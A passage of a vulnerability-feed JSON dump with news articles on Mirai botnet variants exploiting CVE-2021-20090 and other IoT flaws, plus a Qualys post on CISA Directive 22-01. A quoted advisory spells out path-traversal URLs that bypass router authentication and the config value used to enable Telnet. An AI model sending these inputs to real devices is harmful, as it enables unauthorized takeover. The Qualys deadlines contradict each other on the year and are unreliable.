Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-16T16:57:46", "type": "threatpost", "title": "Latest Mirai Variant Targets SonicWall, D-Link and IoT Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19356", "CVE-2020-25506", "CVE-2020-26919", "CVE-2021-22502", "CVE-2021-27561", "CVE-2021-27562"], "modified": "2021-03-16T16:57:46", "id": "THREATPOST:3F4C590CA1F6027665DF96DF6D651032", "href": "https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-09T19:54:43", "description": "An authentication-bypass vulnerability affecting multiple routers and internet-of-things (IoT) devices is being actively exploited in the wild, according to researchers.\n\nThe security flaw, tracked as CVE-2021-20090, was disclosed last week by researchers at Tenable. It affects devices from 20 different vendors and ISPs (ADB, Arcadyan, ASMAX, ASUS, Beeline, British Telecom, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom [Argentina], TelMex, Telstra, Telus, Verizon and Vodafone), all of which use the same firmware from Arcadyan. In all, millions of devices worldwide could be vulnerable.\n\nTenable [demonstrated](<https://www.tenable.com/security/research/tra-2021-13>) in a proof of concept (PoC) that it\u2019s possible to modify a device\u2019s configuration to enable Telnet on a vulnerable router and gain root level shell access to the device.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists due to a list of folders which fall under a \u2018bypass list\u2019 for authentication,\u201d according to Tenable\u2019s advisory on August 3. \u201cFor most of the devices listed, that means that the vulnerability can be triggered by multiple paths. For a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\n * http://<ip>/images/..%2findex.htm\n * http://<ip>/js/..%2findex.htm\n * http://<ip>/css/..%2findex.htm\n\n\u201cTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal,\u201d the advisory continued.\n\n## **Exploited to Spread Mirai Variant**\n\nJust three days after disclosure, on Friday, cybersecurity researchers from Juniper Networks said they had discovered active exploitation of the bug.\n\n\u201cWe have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,\u201d they wrote [in a post](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>). \u201cThe attacker seems to be attempting to deploy a [Mirai variant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) on the affected routers.\u201d\n\nCleaving close to Tenable\u2019s PoC, the attackers are modifying the configuration of the attacked device to enable Telnet using \u201cARC_SYS_TelnetdEnable=1\u201d to take control, according to Juniper. Then, they proceed to download the Mirai variant from a command-and-control (C2) server and execute it.\n\nMirai is a long-running botnet that infects connected devices and can be used to mount distributed denial-of-service (DDoS) attacks. It [burst on the scene](<https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/>) in 2016, when it overwhelmed servers at the Dyn web hosting company, taking down more than 1,200 websites, including Netflix and Twitter. Its source code [was leaked](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) later that year, after which multiple Mirai variants began to crop up, in a barrage that continues to this day.\n\nSome of the scripts in the current set of attacks bear resemblance to previously observed activity picked up in February and March, according to Juniper.\n\n\u201cThe similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\u201d researchers wrote. \u201cGiven that most people may not even be aware of the security risk and won\u2019t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.\u201d\n\nIn addition to the router bug, Juniper researchers observed the following known vulnerabilities being exploited to gain initial access to target devices:\n\n * CVE-2020-29557 (DLink routers)\n * CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)\n * CVE-2021-31755 (Tenda AC11)\n * CVE-2021-22502 (MicroFocus OBR)\n * CVE-2021-22506 (MicroFocus AM)\n\nIn fact, the attackers have been continuously adding new exploits to its arsenal, according to the posting, and CVE-2021-20090 is unlikely to be the last.\n\n\u201cIt is clear that threat actors keep an eye on all disclosed vulnerabilities,\u201d researchers concluded. \u201cWhenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks.\u201d\n\nTo avoid compromise, users should update their firmware on the router.\n\n\u201cIn the case of IoT devices or home gateways, the situation is much worse as most users are not tech-savvy and even those who are do not get informed about potential vulnerabilities and patches to apply,\u201d according to Juniper. \u201cThe only sure way to remedy this issue is to require vendors to offer zero-down-time automatic updates.\u201d\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T19:41:30", "type": "threatpost", "title": "Auth Bypass Bug Exploited, Millions of Routers Affected", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-09T19:41:30", "id": "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "href": "https://threatpost.com/auth-bypass-bug-routers-exploited/168491/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-RHtuGy5HftM/YFCJDLIpWjI/AAAAAAAACCw/pM55oGojHcUHm6M2-ZX9QAX6Z-Nm1z4UACLcBGAsYHQ/s0/botnet.jpg>)\n\nCybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy new Mirai variants on internet connected devices.\n\n\"Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,\" Palo Alto Networks' Unit 42 Threat Intelligence Team [said](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in a write-up.\n\nThe rash of vulnerabilities being exploited include:\n\n * [VisualDoor](<https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/>) \\- a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January\n * [CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>) \\- a D-Link DNS-320 firewall remote code execution (RCE) vulnerability\n * [CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>) \\- Two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges\n * [CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>) \\- an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40\n * [CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) \\- a Netis WF2419 wireless router RCE exploit, and\n * [CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>) \\- a Netgear ProSAFE Plus RCE vulnerability\n\n\"The VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases,\" SonicWall said in a statement to The Hacker News. \"It is not viable against any properly patched SonicWall appliances.\"\n\nAlso included in the mix are three previously undisclosed command injection vulnerabilities that were deployed against unknown targets, one of which, according to the researchers, has been observed in conjunction with a separate botnet by the name of [MooBot](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot>).\n\nThe attacks are said to have been detected over a month-long period starting from February 16 to as recent as March 13.\n\nRegardless of the flaws used to achieve successful exploitation, the attack chain involves the use of wget utility to download a shell script from the malware infrastructure that's then used to fetch [Mirai](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai>) binaries, a notorious malware that turns networked IoT devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks.\n\nBesides downloading Mirai, additional shell scripts have been spotted retrieving executables to facilitate brute-force attacks to break into vulnerable devices with weak passwords.\n\n\"The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences,\" the researcher said.\n\n### New ZHtrap Botnet Traps Victims Using a Honeypot\n\nIn a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that makes use of a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet known as [Matryosh](<https://thehackernews.com/2021/02/beware-new-matryosh-ddos-botnet.html>).\n\n[](<https://thehackernews.com/images/-uqNg1z1INRs/YFCGXS3KMzI/AAAAAAAACCo/_lMwW_bvOD8a4SK4Ri190P4PBgrM4o2AQCLcBGAsYHQ/s0/botnet-malwar.jpg>)\n\nWhile honeypots typically mimic a target for cyber criminals so as to take advantage of their intrusion attempts to glean more information about their modus operandi, the ZHtrap botnet uses a similar technique by integrating a scanning IP collection module for gathering IP addresses that are used as targets for further worm-like propagation.\n\nIt achieves this by listening on 23 designated ports and identifying IP addresses that connect to these ports, then using the amassed IP addresses to inspect them for four vulnerabilities to inject the payload -\n\n * MVPower DVR Shell [unauthenticated RCE](<https://www.exploit-db.com/exploits/41471>)\n * Netgear DGN1000 Setup.cgi [unauthenticated RCE](<https://www.exploit-db.com/exploits/43055>)\n * [CCTV DVR RCE](<https://www.exploit-db.com/exploits/39596>) affecting multiple vendors, and\n * Realtek SDK miniigd SOAP [command execution](<https://www.exploit-db.com/exploits/37169>) (CVE-2014-8361)\n\n\"ZHtrap's propagation uses four N-day vulnerabilities, the main function is DDoS and scanning, while integrating some backdoor features,\" the researchers [said](<https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/>). \"Zhtrap sets up a honeypot on the infected device, [and] takes snapshots for the victim devices, and disables the running of new commands based on the snapshot, thus achieving exclusivity over the device.\"\n\n[](<https://thehackernews.com/images/-Uzpn4VdFyoE/YFCEwPNpN2I/AAAAAAAACCk/OLQNFZXfk90IMbMQYZNw8YzlN-g5YeszgCLcBGAsYHQ/s0/botnet-malware.jpg>)\n\nOnce it has taken over the devices, ZHtrap takes a cue from the Matryosh botnet by using Tor for communications with a command-and-control server to download and execute additional payloads.\n\nNoting that the attacks began from February 28, 2021, the researchers said ZHtrap's ability to turn infected devices into honeypots marks an \"interesting\" evolution of botnets to facilitate finding more targets.\n\nThese Mirai-based botnets are the latest to spring up on the threat landscape, in part fanned by the availability of Mirai's source code on the Internet since 2016, opening the field wide open for other attackers to build their own variants.\n\nLast March, researchers discovered a Mirai variant called \"[Mukashi](<https://thehackernews.com/2020/03/zyxel-mukashi-mirai-iot-botnet.html>),\" which was found targeting Zyxel network-attached storage (NAS) devices to conscript them into a botnet. Then in October 2020, Avira's IoT research team identified another variant of the Mirai botnet named \"[Katana](<https://www.avira.com/en/blog/katana-a-new-variant-of-the-mirai-botnet>),\" which exploited remote code execution vulnerabilities to infect D-Link DSL-7740C routers, DOCSIS 3.1 wireless gateway devices, and Dell PowerConnect 6224 Switches.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T10:32:00", "type": "thn", "title": "New Mirai Variant and ZHtrap Botnet Malware Emerge in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2019-19356", "CVE-2020-25506", "CVE-2020-26919", "CVE-2021-22502", "CVE-2021-27561", "CVE-2021-27562"], "modified": "2021-03-18T03:14:02", "id": "THN:3907AE12F794F0523BEE196D6543A50F", "href": "https://thehackernews.com/2021/03/new-mirai-variant-and-zhtrap-botnet.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-OyZSMpBc91Y/YRI88ocfD1I/AAAAAAAADfA/3z5jFwd1jb86NrMApn9qnJvhJh69BR5qwCLcBGAsYHQ/s0/router-hacking-exploit.jpg>)\n\nUnidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure.\n\nTracked as [CVE-2021-20090](<https://nvd.nist.gov/vuln/detail/CVE-2021-20090>) (CVSS score: 9.9), the [weakness](<https://www.kb.cert.org/vuls/id/914124>) concerns a [path traversal vulnerability](<https://www.tenable.com/security/research/tra-2021-13>) in the web interfaces of [routers with Arcadyan firmware](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) that could allow unauthenticated remote attackers to bypass authentication.\n\nDisclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone.\n\nSuccessful exploitation of the vulnerability could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n[](<https://thehackernews.com/images/-VpbYTZFqKSM/YRJGcZG2KXI/AAAAAAAADfI/G8Fi_k66FRwXnFO9vKQUXyFTF5Cy0lfJwCLcBGAsYHQ/s0/router.jpg>)\n\nJuniper Threat Labs last week [said](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) it \"identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China\" starting on August 5, with the attacker leveraging it to deploy a Mirai variant on the affected routers, mirroring similar techniques [revealed](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) by Palo Alto Networks' Unit 42 earlier this March.\n\n\"The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\" the researchers said.\n\nBesides CVE-2021\u201320090, the threat actor is also said to have carried out attacks leveraging a number of other vulnerabilities, such as -\n\n * [CVE-2020-29557](<https://nvd.nist.gov/vuln/detail/CVE-2020-29557>) (Pre-authentication remote code execution in D-Link DIR-825 R1 devices)\n * [CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) and [CVE-2021-1498](<https://nvd.nist.gov/vuln/detail/CVE-2021-1498>) (Command injection vulnerabilities in [Cisco HyperFlex HX](<https://thehackernews.com/2021/05/critical-flaws-hit-cisco-sd-wan-vmanage.html>))\n * [CVE-2021-31755](<https://nvd.nist.gov/vuln/detail/CVE-2021-31755>) (Stack buffer overflow vulnerability in Tenda AC11 leading to arbitrary code execution)\n * [CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T09:27:00", "type": "thn", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-11T03:38:35", "id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets 